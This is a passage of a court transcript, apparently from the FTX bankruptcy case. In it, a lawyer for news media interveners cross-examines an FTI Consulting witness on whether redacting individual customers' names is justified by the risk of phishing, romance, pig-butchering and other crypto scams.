15   identification.

16   Q    Isn't it also true it's possible to go -- again, take a

17   company that's not an FTX customer and go to their website,

18   find out things about them, do all of the things that you're

19   talking about on the dark web, and find out information about

20   their customers as well; right?

21           MR. WENDER:  Objection, Your Honor.  He's answered

22   this question two or three times now in different ways.

23           THE COURT:  Overruled.  He can answer again.

24           THE WITNESS:  That is possible, yes.

25           MS. SARKESSIAN:  And I believe those are all of my

**A0583**

 1  questions of this witness.  Thank you, Your Honor.

 2          THE COURT:  Thank you.

 3                    CROSS-EXAMINATION

 4  BY MS. TOWNSEND:

 5  Q    Good morning, Mr. Sheridan.  My name is Katie Townsend,

 6  I'm one of the attorneys representing the news media

 7  interveners, *The New York Times*, *The Wall Street Journal*, the

 8  *Financial Times*, and Bloomberg, in this matter.

 9  A    Good morning, ma'am.

10  Q    I'm going to do something similar to what

11  Ms. Sarkessian did, which is I'm going to start with your

12  declaration and then move to some questions from your live

13  testimony today.

14      You testified that you're the manager director at -- a

15  managing director, excuse me, at FTI Consulting.  Is that the

16  financial adviser for the Official Committee of Unsecured

17  Creditors in this matter?

18  A    FTI Consulting as a whole?

19  Q    Yes.

20  A    Yes.

21  Q    To simplify things, by the way, if I use the phrase

22  official committee, you'll know I'm talking about the

23  Official Committee of Unsecured Creditors; correct?

24  A    Yes, ma'am.

25  Q    And if I use the word or the term individuals, you'll

1  know I'm referring to natural persons and not entities;

2  right?

3  A      Yes, ma'am.

4  Q      Do you know the identities of any individuals who are

5  members of the official committee?

6  A      No, ma'am.

7  Q      Do you know the identities of any individuals who are

8  among debtors' top 50 creditors?

9  A      No, ma'am.

10 Q      Do you know the identities of any individuals who are

11 customers of the debtors whose names have been redacted from

12 the filings in this case?

13 A      No, ma'am.

14 Q      You testified that by combining the name -- well, let

15 me do it this way.  Do you have paragraph 9 of your

16 declaration in front of you?

17        (Pause)

18 A      Yes, ma'am.

19 Q      You testified -- in this paragraph, you state that by

20 combining the name of an individual with other publicly-

21 available sources, a malefactor will be able to harvest a

22 full biography of a person, what you refer to as a dossier.

23 That's true of anyone, isn't it, not just the creditor

24 customers of debtors in this case?

25 A      Is it true that a criminal actor can create a dossier

1  of any individual they're trying to target?

2  Q    Yes.

3  A    Uh, I wouldn't say it's true of anyone.  I think you

4  need corroborating information, which in today's day and age

5  is generally easy to find.  I mean, is there someone who's

6  completely removed themselves from the ability to do that?

7  It's possible.

8  Q    Is that because how much information is available about

9  a person from publicly-available sources varies by person?

10 A    Yes, some people are easier to build that than others,

11 yes.

12 Q    You don't know what, if any, steps any of the customers

13 of the debtors whose names have been redacted from the

14 filings in this case have taken to limit what information is

15 available about them from publicly-available sources; do you?

16 A    I do not.

17 Q    Would you say that a data breach involving an

18 individual's data could increase the likelihood that someone

19 will be targeted by an online scam regardless of whether that

20 individual holds cryptocurrency?

21 A    That's accurate.

22 Q    And information obtained through data breaches

23 involving, I think you gave the examples of Yahoo, LinkedIn,

24 Facebook, Marriott, they're not going to include the data of

25 anyone who didn't use those services; correct?

1  A    I don't know that for sure, what type of data was

2  released in each of those instances.  In other words, if the

3  Facebook data breach involved an individual user plus their

4  contact list, then that would be individuals who are greater

5  than the specific individual whose data was breached.  Does

6  that make sense?

7  Q    That does make sense.  So, if I understand it

8  correctly, to the -- it depends on the nature of the

9  information that was involved in the breach?

10 A    Yes, ma'am.

11 Q    Okay, but -- well, let me say it this way.

12 Hypothetically, if it did not involve -- a data breach of,

13 let's say, Facebook -- did not involve the contact

14 information, an individual's contact information, an

15 individual Facebook user's contact information, would that

16 data breach have captured information of individuals who are

17 not users of Facebook?

18 A    Again, it depends on the nature of the breach.  If the

19 breach involves, you know, into administrator accounts on

20 that individual's profile, then anything that individual has

21 accessed to include other individuals -- you know, if this

22 individual that was targeted serves in a data processing

23 capacity or somehow stores information of other individuals

24 or financial information of other individuals within their

25 network or on their system and that data breach compromised

1   that, in other words, it's not just a data breach about your

2   name or your personally-identifiable information, but it's a

3   data breach of your system and your administrator access to

4   your entire files, then the data breach could be much larger.

5   Q    You don't know what steps, if any, any of the customers

6   of debtors whose names have been redacted in this case have

7   taken to protect information that may have been compromised

8   in a data breach; do you?

9   A    I do not know that information.

10  Q    There are ways for individuals who learn that their

11  information may have been compromised in a data breach to

12  seek to protect that information, aren't there?

13  A    Yes.  The number one rule in protecting yourself online

14  is not to put your name or other identifiable information out

15  there, so yes.

16  Q    Can you take a look at paragraph 10 of your

17  declaration?

18  A    Yes, ma'am.

19  Q    You testified that the odds of success for identity and

20  asset theft crimes are increased if they are committed

21  against vulnerable persons such as the debtors' customers in

22  these Chapter 11 cases whose circumstances provide greater

23  opportunity to or reduced defense against the malefactor.

24      Can you tell me what the basis is for your assertion

25  that any of the debtors' customers are vulnerable persons?

**A0588**

1    A    Similar to my answer before, it is an assessment based

2    on the very quick change that FTX's prominence and purported

3    offerings to customers demonstrated in this case.  In other

4    words, FTX was seen as the pillar and strength and shining

5    star of the cryptocurrency industry and I think it generated

6    a lot of trust, safety, and security in its customer base

7    that was quickly changed based on the nature of this -- of

8    everything that occurred.  And so I think when someone

9    encounters that type of violation, for lack of a better word,

10   they are in what I would consider a vulnerable state,

11   especially in financial circumstances.

12   Q    Okay.  So is it fair to say that it is the fact that

13   they are involved in this bankruptcy proceeding that, in your

14   view, makes however many of the debtors' approximately nine

15   million customers who are individuals more vulnerable to

16   potential scams?

17   A    Can you repeat the question?  I'm sorry.

18   Q    Sure.  I'm trying to do this as best I can.

19        In your view, is it just the fact that these

20   individuals are involved in this bankruptcy proceeding that

21   makes them, in your view, more vulnerable?

22   A    I think the totality of circumstances and

23   considerations in this case make them more vulnerable, this

24   is one element of it.

25   Q    Can you explain that a little bit?  When you say the

1   totality of the circumstances, you're referring to the fact

2   that they're FTX customers only or is there something more?

3        I'm just trying to get to the -- your -- the basis for

4   your understanding as to why these customers are more

5   vulnerable.

6   A    Yes, it is -- if I understand your question correctly,

7   why do I consider these customers more vulnerable, is that --

8   Q    Right.

9   A    Again, because they were in a business and financial

10  situation that was considered to be very secure, very safe,

11  something that would result in a profitable and income-

12  earning opportunity that very quickly, very publicly, very

13  steeply, those circumstances changed to be the exact inverse

14  of that.  And when you, in my opinion, deal with that type of

15  cognitive dissonance between what you expect and what reality

16  presents, it creates a situation in which you may be more

17  willing to seek ways to correct that, and that is an

18  opportunity for criminal actors to take advantage of that

19  perspective, that position, or that mental state, and may

20  make those individuals more vulnerable to the types of

21  cybercrimes I've described.

22  Q    In your view, are all of the something close to nine

23  million customers of FTX equally vulnerable because of their

24  involvement with FTX?

25  A    I think they're all equally vulnerable not necessarily

1   because of this mental state, if you're focused on paragraph

2   10, I think they're all equally vulnerable because of the

3   increased risks in this situation, the circumstances I've

4   described, the nature of cryptocurrency, the public profile

5   of this case, the inflammatory nature of crypto Twitter, the

6   lack of institutional and traditional financial backstops and

7   provisions and protections that are in place.  I think

8   they're equally vulnerable for all of the circumstances, not

9   just what's described in paragraph 10.

10  Q     Well, is paragraph 10 intended to be referring to the

11  customer's mental state?  Because the last sentence of that

12  says some of the debtors' individual customers may be

13  vulnerable due to the monetary losses they have experienced.

14  A     Vulnerability in this specific paragraph, paragraph 10,

15  is a perspective and I wouldn't disagree with the

16  characterization of mental state, but what I mean in that

17  last sentence is that mental state and that perspective of

18  victimization and intent to correct that victimization or

19  recoup from those losses, if your losses are higher or the

20  valuations you have placed at FTX that are now not available

21  to you, I am presenting that that creates a potentially

22  higher level of vulnerability because of the valuations

23  involved.

24  Q     You testified earlier that you don't know the

25  identities of any of the debtors' customers whose names have

1    been redacted from the filings in this case, so is it fair to

2    say that you don't know the financial circumstances of any of

3    those individuals?

4    A    That is correct.

5    Q    In preparing your testimony today, did you -- or your

6    declaration -- did you attempt to determine whether or not

7    being involved in a bankruptcy proceeding outside of the

8    cryptocurrency context makes an individual more vulnerable to

9    attempted identity and asset theft crimes?

10   A    I think those circumstances, in my opinion, are

11   different than this situation because of the cryptocurrency

12   element, so I did not.

13   Q    You did not.

14        Is it fair to say that, in your opinion, the most

15   relevant types of online financial fraud scams here are

16   business email compromise, romance scams, pig butchering,

17   phishing attacks, and account spoofing?

18   A    I don't think you listed SIM swaps, which I would add

19   to that list.

20   Q    Okay.

21   A    That's certainly not an all-inclusive list, I think

22   those are the ones with which I have the most personal

23   experience of conducting investigations related to

24   cryptocurrency schemes, which is why I listed them.

25   Q    Can you look at paragraph 13 of your declaration?  This

1  refers to business email compromise scams.

2  A     Yes, ma'am.

3  Q     Is that sometimes also referred to as an email account

4  compromise?

5  A     I would not refer to it as that.

6  Q     You've never heard that?

7  A     I've heard of email account compromise, but I don't

8  equate it to business email compromise.

9  Q     What's the difference?

10 A     An email account compromise could just be unauthorized

11 access to your individual email for a variety of reasons,

12 maybe not necessarily financially motivated.  It could be

13 just to find information about you, a stalking case or some

14 other way to obtain information on you.  Business email

15 compromise is specifically intended to misrepresent a

16 business transaction or operation in email format and target

17 an individual for the purpose of illicit financial gain.

18 Q     I see, okay.  Can a business email compromise scheme

19 target anyone with an email address?

20 A     Can it target anyone with an email address?

21 Q     Yes.

22 A     Yes.

23 Q     Business email compromise scams are not unique to the

24 cryptocurrency context; correct?

25 A     That is correct.

1  Q     In preparing your declaration or your testimony today,

2  did you review any data or research comparing how often known

3  cryptocurrency holders are targeted with business email

4  compromise scams versus how often individuals who are not

5  known cryptocurrency holders are targeted with that kind of

6  scam?

7  A     I did not make that distinction.

8  Q     And a similar question, but slightly different.  In

9  preparing your declaration or your testimony in this matter,

10 did you review any data or research comparing how often known

11 cryptocurrency holders are victims of business email

12 compromise scam versus non-cryptocurrency holders?

13 A     Again, I didn't make comparison between cryptocurrency

14 holder and non-cryptocurrency holder.  My assessments are

15 based on the cryptocurrency holder information being more

16 substantive and fruitful for identifying individuals for

17 criminal schemes.

18 Q     So you're not aware of any data that shows that

19 cryptocurrency holders are more likely to be victims of

20 business email compromise scams than non-cryptocurrency

21 holders, are you?

22 A     I believe the Chainalysis report does make crypto-

23 specific statistical determinations, but I don't have those

24 memorized or part of --

25 Q     You don't have them memorized?

1    A      -- part of my information, yeah.

2    Q      Why --

3    A      And --

4    Q      -- why don't I show you what I think is what you're

5    referring to, a 2023 crypto crime report dated February 23rd,

6    it was attached as Exhibit E to your declaration?

7    A      Yes, that's what I'm referring to.

8    Q      Do you have a copy of that or do you need a copy of

9    that?

10   A      Yes, ma'am.

11   Q      You do have a copy?

12   A      Yes, ma'am.

13           MS. TOWNSEND:  Your Honor, do you need a copy of

14   this --

15           THE COURT:  I have it.  Thank you.

16       (Pause)

17   BY MS. TOWNSEND:

18   Q      So you indicated that this report -- well, let me ask

19   you this first.  What's chain analysis?

20   A      It's Chainalysis --

21   Q      Chainalysis, excuse me.  What is Chainalysis?

22   A      They are an investigative company that provides data on

23   all types of crypto operations, everything from transactions

24   to criminal activity and in between.  They also are a third

25   party supplier of a blockchain analytics tool called Reactor

1   that I referred to in my credentials, and Reactor is a

2   searchable engine that allows you to identify cryptocurrency

3   transactions and use that for attribution of individual

4   users.

5   Q     Did you have any involvement in the preparation of this

6   report?

7   A     No, ma'am.

8   Q     Is this report one of the documents that you relied on

9   to prepare your testimony in this matter?

10  A     I read this report as part of my job for all functions

11  that I do related to crypto investigations, not specifically

12  for my testimony.

13  Q     Okay.  You indicated that this report has data that

14  shows how often cryptocurrency holders or known

15  cryptocurrency holders are targeted with business email

16  compromise schemes versus non-cryptocurrency holders -- I

17  realize it's a big report, but can you point this to me,

18  this --

19  A     I want to make a clarification on that.

20  Q     Oh, of course.

21  A     This report documents and reports on cryptocurrency

22  crimes, of which business email compromises are one of them,

23  if I believe -- if I remember the category.  From there, it

24  would be possible to make the distinction you're asking me

25  about about business email compromise crimes that involve

 1  cryptocurrency, which I would get from this report to DOJ's,

 2  the FBI's Bureau of Statistics about business email

 3  compromise in general.

 4       I wasn't saying that I could --

 5  Q    I see.

 6  A    -- go to this report and make that distinction.  I

 7  could use this report for data in order to then make that

 8  distinction.

 9  Q    Okay, I misunderstood.  So, sitting here today, you

10  can't speak to the difference between how much more

11  frequently a known cryptocurrency holder is a victim of

12  business email compromise scam than a non-known

13  cryptocurrency holder, can you?

14  A    I could not give you that data.

15  Q    Okay.  Can you turn to Exhibit D of the declaration

16  that you proffered?  And let me know if you -- I think you

17  have a copy of everything -- or you don't have a copy of it?

18  A    Yeah, I just need to know the tab, please.

19  Q    It's -- oh --

20            UNIDENTIFIED SPEAKER:  It's tab 5.

21  BY MS. TOWNSEND:

22  Q    Tab 5.

23  A    Yes, ma'am.

24  Q    Can you tell me what this is?

25  A    This is a business email compromise report as published

 1  by -- I think this is an FBI advisory.

 2  Q     And is this one of the documents that you relied on in

 3  preparing your declaration?

 4  A     Yes.

 5  Q     If you look at paragraph 13 of your declaration,

 6  there's a cite to the -- and I believe a quote from this

 7  document in the last sentence of paragraph 13.  Do you see

 8  that?

 9  A     Yes, ma'am.

10  Q     Okay.  Your declaration, the last sentence reads,

11  "knowledge of the target's personal details is integral to

12  the execution of the scheme," referring to the business email

13  compromise scheme, "such that the Federal Bureau of

14  Investigation's first recommended safeguard against them is

15  to be careful with what information you share online," dot,

16  dot, dot.  Do you see that?

17  A     Yes, ma'am.

18  Q     If you look at the document that you cited to,

19  Exhibit D.

20  A     Yes, ma'am.

21  Q     The last part of that FBI proviso says -- it's the

22  first, I think, bullet point under how to protect yourself.

23        Do you see that?

24  A     Yes, ma'am.

25  Q     And it indicates, by openly sharing -- or it states, be

**A0598**

1  careful with what information you share online or on social

2  media by openly sharing things like pet names, schools you

3  attended, links to family members, and your birthday, you can

4  give a scammer all the information they need to guess your

5  password or answer your security -- or answer your security

6  questions, excuse me.

7      When you stated in your declaration that knowledge of

8  the target's personal details is integral to the execution of

9  a business email compromise scheme, are those the kind of

10  personal details -- pet names, schools attended, birthdays --

11  that you were referring to?

12  A    Those could certainly be helpful in a business email

13  compromise.  Business email compromise details, however, are

14  more related to business activities of the individual,

15  whether they're involved in purchasing a home or, you know,

16  buying a business or selling a business, or conducting any

17  type of online business operations.

18  Q    So different information than what's in the FBI

19  proviso, in your view, or more financial information?

20  A    Yeah.  I mean any information, when you're conducting a

21  criminal scheme, is of value.  So, in my experience, have I

22  seen business email compromise that referenced what the FBI

23  is listing here about personal -- what I would consider

24  personal versus business details, I have not seen that.

25  However, the personal details that are listed here would be

1   used to create what I call the dossier of the individual and

2   from that I could learn their business operations, learn what

3   they're engaged in, and then specifically tailor the business

4   email compromise to more effectively target them.

5        So it is related, it's just not something that would

6   directly be in the business email compromise -- or business

7   email of the business email compromise scheme.

8   Q     Would you say that not -- or being careful about

9   sharing that kind of information online is an online safety

10  tip that's generally applicable to everyone?

11  A     Yes.

12  Q     Let's talk about phishing.  Is it fair to say that

13  phishing is a way to carry out a business email compromise or

14  email account compromise scam?

15  A     Yes, the distinctions and titles and definitions

16  sometimes are overlapping.

17  Q     And phishing involves a bad actor posing as a known or

18  trusted entity through an email, text message, or instant

19  message; right?

20  A     That's correct.

21  Q     A phishing scheme could target anyone who uses email,

22  text messages, or instant messages; correct?

23  A     Yes, it can.

24  Q     It's not unique to the cryptocurrency context, is it?

25  A     It is not unique to cryptocurrency.

1   Q     And, in your professional experience, you've seen

2   successful phishing attacks in the cryptocurrency context and

3   outside the cryptocurrency context; haven't you?

4   A     Yes, ma'am.

5   Q     In preparing your declaration or your testimony in this

6   matter today, did you review any data or research comparing

7   how often known cryptocurrency holders are phishing targets

8   versus how often non-known cryptocurrency holders are

9   phishing targets?

10  A     No, ma'am.

11  Q     And, a similar a question, in preparing your testimony

12  in this matter or your declaration, did you review any data

13  or research comparing how often known cryptocurrency holders

14  are victims of phishing attacks versus how often individuals

15  who are not known cryptocurrency holders are victims of

16  phishing attacks?

17  A     I did not review data; I relied on my personal

18  experience.

19  Q     And, in your personal experience, are known

20  cryptocurrency holders more often victims of phishing attacks

21  than non-known cryptocurrency holders?

22  A     Yes, ma'am, it's a more effective way to generate

23  criminal proceeds because of the circumstances of and nature

24  of the asset, as I described earlier; it's instantaneous,

25  near-instantaneous, it's global, it's valuable, it's pseudo-

1  anonymous, it's irreversible.

2       And so it is both the method and the means in which the

3  majority of criminal schemes in an online sense are conducted

4  in our -- in the bulk of our investigations.

5  Q    So just so I understand your answer, it's your

6  testimony that in your experience you're more likely to be a

7  victim of a phishing attack if you are a known holder of

8  cryptocurrency than if you are not a known holder of

9  cryptocurrency?

10 A    Again, we don't make those distinctions.  What I'm

11 saying is it's more -- the schemes are carried out using

12 cryptocurrency in an overwhelming number of cases because

13 that's how the criminals are paid and that's how the proceeds

14 are transferred.  Whether or not the criminal knows the

15 individual is a known holder or not, we don't make that

16 distinction, similar to the answers I provided before.

17 Q    Okay.  I just wanted to clarify that.

18      Can you look at Exhibit C to your declaration?  And let

19 me know if you need a copy -- or if anyone else needs a copy.

20      (Pause)

21 A    Is that --

22 Q    It's a news article from --

23          UNIDENTIFIED SPEAKER:  It's tab 4.

24 BY MS. TOWNSEND:

25 Q    It's tab 4, I'm sorry.

```
 1   A      Yes, ma'am.

 2   Q      This is a news article from December 2022 entitled,

 3   "Crypto Users Claim Gemini Email Leak Occurred Much Earlier

 4   than First Reported."

 5          Is this an article that you relied on in preparing your

 6   declaration today -- or your testimony today?  Excuse me.

 7   A      I don't recall relying on this heavily.  I think this

 8   was included just as a means of example and reference.

 9   Q      Okay.  The article reported that after the

10   cryptocurrency exchange, Gemini suffered a data breach, users

11   of that exchange reported receiving phishing emails; is that

12   right?

13   A      That's --

14   Q      Is that your understanding?

15   A      That's correct.

16   Q      Okay.  And that data breach included the customers'

17   email addresses and partial phone numbers, not just their

18   names; is that correct -- or is that your understanding?

19   A      Yes, that's correct.

20   Q      Do you have any information about those phishing

21   attempts related to that Gemini leak other than what is in

22   Exhibit C?

23   A      No, ma'am.

24   Q      You don't know, for example, whether any of those

25   phishing attempts were successful?
```

1  A      Correct.

2  Q      Can we look at paragraph 17 of your declaration?  And

3  this pertains to account spoofing.

4  A      Yes, ma'am.

5  Q      Is account spoofing another way to carry out a business

6  email compromise or email account compromise scam?

7  A      Again, the distinctions blur because there is email

8  involved in an account-spoofing scheme.  So, by technical

9  definition, you could call it a business email compromise,

10 but the precipitating criminal action of the account spoof is

11 not generally conducted through business email compromise,

12 although it can be.

13 Q      So is it fair to say that account spoofing entails a

14 bad actor disguising an email address, display name, phone

15 number, text message, or website URL to convince the target

16 that the source of a message is legitimate?

17 A      That's accurate.

18 Q      Account spoofing can target anyone who uses a computer

19 or a cell phone; right?

20 A      Yes, ma'am.

21 Q      And it's not unique to the cryptocurrency context; is

22 it?

23 A      No, ma'am.

24 Q      In preparing your testimony, did you review any data or

25 research that compared how often known cryptocurrency holders

**A0604**

1   are targets of account-spoofing scams versus non-known

2   cryptocurrency holders?

3   A    Similar answer as to before, I did not make those

4   distinctions.

5   Q    Okay.  And I'm sorry for the repetition.

6   A    No, just --

7   Q    And, in preparing your testimony, did you review any

8   data or research comparing how often known cryptocurrency

9   holders are victims of account spoofing as opposed to non-

10  cryptocurrency holders?

11  A    No.  Again, in my experience, the majority of victims

12  and targets that we dealt with were cryptocurrency holders by

13  nature of how these crimes are executed.

14  Q    I understand; similar answer to the previous types of

15  scams?

16  A    Yes, ma'am.

17  Q    Can you look at paragraph 18 to your declaration?

18  A    Yes, ma'am.

19  Q    This relates to In re Celsius Network, LLC.  Does FTI

20  Consulting have any involvement in the Celsius bankruptcy?

21  A    Not in my practice, I don't know about FTI as a whole.

22  Q    Okay.  So let me ask you this then, do you personally

23  have any involvement in the Celsius bankruptcy?

24  A    No, ma'am.

25  Q    Your declaration states that many Celsius customers

1   became the target of phishing attacks by scammers posing as

2   bankruptcy lawyers, using emails and phone calls.  What's the

3   basis for that statement?

4   A    I'm sorry, can you repeat the question?

5   Q    Sure.  In paragraph 18 of your declaration, you state

6   that many Celsius customers became the target of phishing

7   attacks by scammers posing as bankruptcy lawyers, using

8   emails and phone calls.  What is the basis for that statement

9   in your declaration?

10  A    The referenced attachments to the declaration, both the

11  media reports, as well as the legal documents that were

12  produced following these phishing and other criminal

13  attempts.

14  Q    Is that statement based on anything else?

15  A    Is the statement based on anything else, other --

16  Q    I'm not trying to trick you.  I'm just asking if your

17  knowledge of what's in paragraph 18 is based solely on those

18  exhibits that you cited in your declaration.

19  A    Yes, that's correct.

20  Q    Do you know how many Celsius customers were the targets

21  of those phishing attempts?

22  A    I don't know specifically.

23  Q    Do you know how many of the Celsius customers who were

24  the targets of those phishing attempts were foreign

25  individuals?

**A0606**

1    A      I don't know, ma'am.

2    Q      And do you know how many of those phishing attempts

3    targeting Celsius customers were successful?

4    A      No, ma'am.

5    Q      The exhibits attached to your declaration -- well,

6    strike that.

7           Do you know how debtor's attorneys in the <u>Celsius</u> case

8    became aware of these phishing attempts?

9    A      No.

10   Q      The notices that are attached to your declaration that

11   have been entered into evidence indicate that there were

12   steps taken both by the court and by the parties in the

13   <u>Celsius</u> bankruptcy to notify anyone involved of those

14   phishing attempts, is that your understanding?

15   A      That is my understanding.

16   Q      Do you think that's a prudent step to take?

17   A      I do, but even as referenced in those attempts, there

18   is acknowledgment and admission that they will not reach all

19   customers.  So I think that's a limited approach, at best.

20   Q      But it is an approach that you would -- that you would

21   agree the Court should have taken in that case or that the

22   debtor's counsel should have taken in that case?

23   A      Yes, ma'am.

24   Q      And why is that?

25   A      You have to try and address the problem.

1  Q      And one way to address the problem is to put people on

2  notice that it's possible that they may be the target of

3  phishing attempts?

4  A      That is one way to address the problem, yes.

5  Q      Can you look at paragraph 14 of your declaration?  And

6  I apologize for jumping around a little bit.

7         Romance scams are another common type of online

8  financial fraud; correct?

9  A      Yes, ma'am.

10  Q      And that's when a bad actor pretends to build a

11  romantic relationship with a victim online in order to

12  convince them or guilt them into sending money; right?

13  A      Yes, ma'am.

14  Q      Romance scams can target anyone; correct?

15  A      Yes, ma'am.

16  Q      And they're not unique to the cryptocurrency context;

17  are they?

18  A      No, ma'am.

19  Q      In preparing your testimony in this case, did you

20  review any data or research comparing how often known

21  cryptocurrency holders are targets of romance scams versus

22  how often individuals who are not known cryptocurrency

23  holders are targets of romance scams?

24  A      A similar answer as to before, ma'am, no.

25  Q      And in preparing your testimony did you review any data

 1  or research comparing how often known cryptocurrency holders

 2  are victims of romance scams versus how often those

 3  individuals who are not known cryptocurrency holders are

 4  victims of romance scams?

 5  A     Similar to before, no, it's just personal experience

 6  that the majority of these scams involve cryptocurrency.

 7  Q     Can you look at page -- or paragraph, excuse me, 15,

 8  the next paragraph?  Pig butchering is another type or common

 9  type of online financial fraud, in your view?

10  A     Yes, ma'am.

11  Q     And these are -- is it fair to say that a pig

12  butchering scam that targets a bad actor who forms an online

13  relationship with their target, convinces them to invest in

14  cryptocurrency, and then steals the invested funds?

15  A     Yes, ma'am.

16  Q     Though it involves the use of cryptocurrency to

17  perpetrate the fraud, pig butchering targets individuals who

18  are not known cryptocurrency holders via text message and

19  social media; right?

20  A     I don't have personal experience with that.  Every pig

21  butchering case that I have seen involves cryptocurrency

22  holders by nature of the scheme itself to continue to invest

23  not only in the opportunity, because it takes advantage of

24  cryptocurrency holders, it explains different facets of the

25  industry and leverages this idea of quick returns, high-

1  volume returns, and is facilitated by all of the

2  characteristics of cryptocurrency that I've listed several

3  times in order to be able to be successful.

4  Q    So, in every example of pig butchering that you have

5  personal experience with, the victim, prior to being

6  contacted by the bad actor, already had an existing wallet,

7  cryptocurrency assets; is that accurate?

8  A    The ones that I've investigated.  It is -- if I

9  understand your question, it is possible for that person not

10  to have cryptocurrency and for the bad actor to convince them

11  to set up a cryptocurrency wallet to further facilitate the

12  crime, but that again, by nature, involves cryptocurrency.

13  Q    In those cases that you have dealt with in your

14  personal experience, did the target know that the

15  individual -- strike that, I said it backwards.

16      In those cases that you have dealt with in your

17  personal experience involving pig butchering, did the bad

18  actor know in advance that the target already had

19  cryptocurrency assets?

20  A    I can't testify to that because that is not a focus of

21  our information-gathering or interview of suspects, that's

22  not something we focus on related to the investigation.

23  Q    So you don't know because that isn't something that you

24  would have asked during the investigation --

25  A    That's correct.

1   Q      -- is that right?

2   A      That's correct.

3   Q      Okay.  So, just to make sure I have this right, you

4   don't know if any of those individuals in those pig

5   butchering scams that you've dealt with personally were

6   targeted because they were known cryptocurrency holders?

7   A      We made that conclusion based on who they targeted, but

8   I did not ask the criminal actor specifically that question.

9   Q      I see.  How many such cases have you dealt with in your

10  career?

11  A      Personally or in a leadership position?

12  Q      Personally, so the group of pig butchering cases that

13  we're talking about.

14  A      There have been three cases that I would classify as

15  specific pig butchering.

16  Q      Okay.  What's the most common form of cryptocurrency

17  scam?

18  A      Theft of crypto assets.

19  Q      Are investment scams the most common form of

20  cryptocurrency scam?

21  A      I mean, that's a very broad definition.  Again, I don't

22  make distinctions on most common scam.  Can you be more

23  specific on what you mean by an investment scam?  Maybe I can

24  answer the question then.

25  Q      Sure.  Why don't you take a look at Exhibit E, if you

**A0611**

1    have that handy again, that's the 2023 crypto crime report

2    that was attached to your declaration.

3    A      Yes.

4                UNIDENTIFIED SPEAKER:   Tab 6.

5                MS. TOWNSEND:   Tab 6.   Thank you.

6    BY MS. TOWNSEND:

7    Q      Can you look at page 91 --

8    A      Yes.

9    Q      -- of that?

10   A      Yes.

11   Q      I believe I have the right page -- oh, I apologize, 92.

12   I had the wrong page.   It's 92 at the bottom.

13   A      Yes, ma'am.

14   Q      Does this -- hang on a second.   I want to make sure I'm

15   not pointing you in the wrong direction.

16               THE COURT:   Are you referring to 92 of the report

17   or the page numbers at the top?

18               MS. TOWNSEND:   That is the issue, Your Honor.

19   Thank you.

20   BY MS. TOWNSEND:

21   Q      Yes, can you take a look at page -- it's 47 at the

22   bottom, 91 at the top, I believe.

23        (Pause)

24   A      Yes, ma'am.

25   Q      I apologize.   I think I just have the wrong page for

1    you and I don't want to tell you the wrong thing.  Give me

2    one second.

3    A     I do recall the statistics in this report that --

4    Q     You do?

5    A     -- reports investment scams as -- is that what you're

6    referring to?

7    Q     That is what I'm referring to and -- well, let me ask

8    you this first.  You've read this report, using the

9    definition of investment scam that's utilized in this report,

10   is it your understanding that investment scams are the

11   largest or, by far at least, the most -- the largest by

12   revenue of any type of cryptocurrency scam?  Let me know if I

13   botched that.

14   A     I believe -- again, this is going from memory, not

15   reading off the report, but memory serves that they did

16   report investment scams as the highest volume and romance

17   scams being the most damaging per individual victim, I

18   believe that was those two qualifications were in that same

19   reference within the report.

20   Q     How would you -- what's your understanding in terms of

21   how it's utilized in this report of what an investment scam

22   is?

23   A     It's a very wide spectrum from individual token

24   offerings being minted and presented as an investment

25   opportunity that those behind that scheme then quickly exit

1    the opportunity with investor funds, it's called a rug-pull,

2    all the way down to the other end of the spectrum to

3    conducting some of the schemes we've identified and discussed

4    today where I manipulate you into a cryptocurrency investment

5    that is either fraudulent or intended to abscond with your

6    funds that you are purportedly investing in cryptocurrency.

7    Q    This report addresses pig butchering separately, it

8    doesn't treat it like an investment scam; right?

9    A    I would not want to testify to the contents of the

10   report with that level of specificity.  It's a lengthy report

11   that I reviewed, but I don't make those types of very

12   specific analyses from the report.

13   Q    Can you look at page 87 of the report?

14            THE COURT:  Before we move on, Ms. Townsend --

15            MS. TOWNSEND:  Yes, Your Honor.

16            THE COURT:  -- let's take a short recess.

17            MS. TOWNSEND:  Of course, Your Honor.

18            THE COURT:  Recess until 11:30, we'll come back.

19            During the break, you're not allowed to talk to

20   anybody about your testimony.

21            THE WITNESS:  Yes, sir.

22        (Recess taken at 11:15 a.m.)

23        (Proceedings resumed at 11:31 a.m.)

24            THE CLERK:  All rise.

25            THE COURT:  Thank you, everyone.  Please be

 1   seated.

 2             Ms. Townsend, you may proceed.

 3             MS. TOWNSEND:  Thank you, Your Honor.

 4             And I don't have much more left.  I think that's

 5   probably good for everyone.

 6                   CROSS-EXAMINATION (Resumed)

 7   BY MS. TOWNSEND:

 8   Q     Can you take a look at Exhibit E, which is Tab 6, I

 9   believe, which is the report that we were talking about

10   earlier.  I used the break time to find the section that I

11   was looking at.  Unsurprisingly, it's entitled "Scams."

12         So if you turn to page 86 at the bottom.

13   A     Yes, ma'am.

14   Q     Do you see the graph in the middle of the page there?

15   A     Yes, ma'am.

16   Q     And that is the amount of yearly -- that reflects the

17   amount of yearly crypto scam revenue, a decrease from 2021 to

18   2022 from 10.9 billion to 5.9 billion; do you see that?

19   A     Yes, ma'am.

20   Q     Do you think that's an accurate assessment?

21   A     Of the decrease?

22   Q     Of -- yes.

23   A     Yes, ma'am.

24   Q     Okay.  Can you look at the next page, page 87.

25   A     Yes, ma'am.

1   Q      And there's a graph in the middle of that page that

2   lists the top 10 crypto scams by revenue in 2022; do you see

3   that?

4   A      Yes, ma'am.

5   Q      The top being TheHyperVerse.net; do you see that?

6   A      Yes, ma'am.

7   Q      What kind of scam is that?

8   A      I did not investigate or research the individual scams,

9   so I could not testify to that.

10  Q      Do you have any reason to doubt the representation in

11  the paragraph below that graph that states:

12              "All 10 of 2022's top scams were investment scams,

13  which is a category dominated overall scam revenue last

14  year."

15  A      I do not have a reason to doubt that.

16  Q      If you look at the next page, page 88, I just wanted to

17  flag this for you.  It indicates a guide to the scam

18  categories we track.

19         Does this reflect a distinction between romance scams

20  and investment scams, for example?

21  A      This analysis does, yes.

22  Q      And does it treat pig-butchering scams as a form of

23  romance scam?

24  A      Yes, it does.

25  Q      You testified earlier today that in your view, and I'm

**A0616**

1   going to paraphrase, because I'm just going on my notes, so

2   if I get something wrong, feel free to correct me, but I

3   understood your testimony to be that the vast majority of FTX

4   consumers didn't demonstrate a high level of sophistication

5   because they fell for, I think the term you used was

6   "investment approach."

7        Can you explain what you meant by that.

8   A    What I was trying to explain with that, my response, as

9   I remember, was to a question about digital asset and crypto

